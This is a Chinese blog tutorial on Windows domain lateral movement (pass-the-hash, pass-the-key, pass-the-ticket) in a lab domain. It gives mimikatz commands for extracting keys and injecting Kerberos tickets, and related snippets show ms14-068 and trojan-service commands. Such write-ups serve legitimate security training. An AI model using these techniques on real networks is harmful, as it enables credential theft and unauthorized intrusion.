内网横向:PTH&PTK&PTT

于 2024-07-25 23:30:40 发布
阅读量1k 收藏 12
点赞数 17
文章标签: 内网安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80116443/article/details/140693756
版权

1.PHT横向

2.PTK横向

3.PTT横向

1.PHT横向:

条件:有管理员的NTLM Hash 并且目标机器开 放445端口

在工作组环境中: Windows Vista 之前的机器,可以使用本地管理员组内用户进行攻击。 WindowsVista 之后的机器,只能是administrator用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击,会提示拒绝访问。

在域环境中: 只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域内任何一台机器

目标:通过横向,上线20机器

利用:

1.先抓取密码,得到管理员密码,猜测一波密码复用

2.进行hash传递:

成功以后,会在我们的靶机上弾一个命令框,我们可以通过这个命令框对我们要横向的机器进行操作

3.我们可以传远程执行工具,对交互shell进行操作

查看本地目标机器目录

4.进行CS上线

复制程序:

创建计划任务:

执行计划任务:

成功上线:

2.PTK横向:

WinXP/2003/Vista/2008 ,以及未打 KB2871997 补丁之前的 Win7/2008r2/8/2012,这些环境我们都可以使用NTLM哈希传递

对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NTLM来进行验证

kb2871997补丁:就是禁止本地管理员进行远程连接,这样就无法以本地管理员用户的权限执行wmi、psexec、schtasks、at和访问文件共享。就是防止哈希传递

但是,即使打了补丁,管理员administrator SID500,照样可以用哈希传递

利用条件:

1.抓取的是域内的ase256  

2.存在远程访问的票据

利用:

1.钓鱼上线

2.绕过UAC

3.查看凭证

mimikatz sekurlsa::ekeys

4.传递key

mimikatz sekurlsa::pth /user:administrator /domain:hack.com /aes256:b03fcae60f0b32a105a8082e89a09cd88a5a6c54b0a209caaa9664c6bc223232

5.传递完成以后会在目标机器上弾一个交互shell,在里面写入计划任务即可上线

3.PTT横向

票据传递攻击一般分为两种:

1、自己制作票据(黄金,白银的前提是要拿下域控)

2、传递内存中的票据

1.导出内存中的票据:要想有票,先用域管登录一下才有票

mimikatz "privilege::debug" "sekurlsa::tickets /export"

2.查看导出的票据:

shell dir

3.清除内存中的票据:

shell klist

shell klist purge

mimikatz kerberos::purge

4.将高权限的票据文件注入内存:这样我们就可以绕过AS,直接访问

mimikatz kerberos::ptt [0;1641eb]-2-0-40e10000-Administrator@krbtgt-HACK.COM.kirbi

5.查看是否导入成功:

shell klist

6.访问机器:

dir \\2012-1.hack.com\c$

7.老一套计划任务上线CS

闰土炖猹
关注
  • 17
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PTH横向移动
网络安全。
02-24 4800
0x01 简介 PTH全称“pass the hash”,即hash传递。PTH通过smb服务进行,走445端口。 0x02 通过PTH横向移动 一、通过cobaltstrike进行PTH 1、在已上线机器中直接dir访问目标系统C盘,提示没权限。 beacon> shell dir \192.168.3.123\c$ 2、此处使用先前已获取的hash对目标administrator用户...
内网安全-横向移动-pth&ptk&ptt
weixin_63920195的博客
07-20 813
根据sid值生成票据文件:shell ms14-068.exe -u fileadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p Admin12345。sc \\192.168.3.21 create bshell binpath= "c:\tool\cws.exe"(创建服务 路径为木马的路径)(在21主机的计算机管理-服务和应用程序-服务-bshell查看是否创建)(mimikatz)
p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递
weixin_43263566的博客
04-25 1509
p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递
内网横向PTH&PTK&PTT哈希票据传递
mingyqf的博客
11-12 4207
内网横向PTH&PTK&PTT哈希票据传递 Kerberos 协议具体工作方法,在域中,简要介绍一下:  客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用 krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检 测,成功之后创建 TGT(Ticket-Granting Ticket)  将 TGT 进行加密签名返回给客户机器,只有域用户 krbtgt 才能读 取 kerberos 中 TGT 数据  然后客户机将 TGT 发送给域控
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4292
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
内网安全】域横向PTH&PTK&PTT哈希票据传递
_Co1a
09-13 2413
Kerberos协议具体工作方法,在域中,简要介绍一下: • 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测,成功之后创建TGT(Ticket-Granting Ticket) • 将TGT进行加密签名返回给客户机器,只有域用户krbtgt才能读取kerberos中TGT数据 • 然后客户机将TGT发送给域控制器KDC请求TGS(票证授权服务)票证,并且对TGT进行检测 • 检测成功之后,将目标服...
68内网安全-域横向PTH&PTK&PTT哈希票据传递
san3144393495的博客
12-29 1545
今天讲PTH&PTK&PTTPTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 用的Kerberos 协议PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试lm加密算法是2003以前的老版,2003用户均为ntlm 算法的hash。
内网渗透-PTH&PTT&PTK
G208_522的博客
10-26 1232
内网渗透系列
内网渗透之横向移动PTH&PTT&PTK
m0_62207170的博客
04-23 927
内网渗透之横向移动PTH&PTT&PTK
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,域横向PTHPTKPTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&PTH哈希&PTT票据&PTK密匙&Kerberoast攻击点&TGT&NTLM爆破
HACKONE的博客
06-23 86
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。生成票据文件:shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!PTH(pass the hash) #利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击)
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
HACKONE的博客
06-23 271
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
本地小说阅读器可执行文件新版
08-29
导入小说,需通过文件-转换,选择txt小说,生成同名小说文件夹; 之后通过文件-小说,选择小说文件夹,就完成小说导入了。 txt小说只需转换一次。
452、基于单片机的智能水杯系统设计(原理图、源代码)
08-29
452、基于单片机的智能水杯系统设计(原理图、源代码) 该系统为单片机的智能水杯系统,实现水质、水温检测,智能控温等设计; 功能: 1、使用51单片机为核心设计; 2、水质TDS值检测,检测水质情况; 3、水温检测; 4、温度和TDS值显示在LCD1602上; 5、按键实现水温阈值控制; 6、加热模块和制冷模块控制,控制水温; 7、声光告警电路,实现温度到达提醒; 8、提供原理图和源代码;
d3dcsxd_46.dll
08-29
Windows 8 SDK 此 SDK 于 2012 年 11 月发布,可用于创建适用于 Windows 8 或更早版本的 Windows 应用 () 使用 Web 技术、本机和托管代码;或使用本机或托管编程模型的桌面应用。
c语言做的一个任务管理器.zip
08-29
c语言入门,c语言做的一个任务管理器,包含全量功能源码,及相关文档说明,供大家学习使用!
Spring Cloud与Seata 2.0集成:零基础安装到AT模式实战的完整教程.zip
最新发布
08-29
Spring Cloud与Seata 2.0的集成是一个涉及微服务架构和分布式事务管理的复杂过程。本教程将从零基础开始,指导你如何安装并配置Spring Cloud环境,以及如何集成Seata 2.0的AT模式。首先,你需要准备相应的开发环境,包括操作系统、Java、Maven和Git等工具。接着,通过Spring Initializr创建Spring Cloud项目,并添加所需的微服务组件依赖。然后,下载并配置Seata Server,同时设置Nacos或Eureka作为注册中心。在Spring Cloud应用中引入Seata AT依赖,并配置事务管理器和协调器。通过编写测试用例来模拟分布式事务场景,并验证事务的一致性和原子性。教程还将涵盖问题排查、性能优化、部署上线、以及使用Seata Dashboard进行监控和告警配置。最后,教程会总结关键步骤,展望Spring Cloud和Seata的未来发展趋势,帮助你构建一个健壮的分布式系统。
内网安全PTHPTKPTT哈希票据攻击策略解析
内网安全-域横向PTHPTKPTT哈希票据传递是针对Windows域环境中的一种高级渗透技术。Kerberos协议是核心环节,它涉及以下几个步骤: 1. **密码哈希传递** (PTH): 用户的明文密码首先经过NTLM哈希,与时间戳一起...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值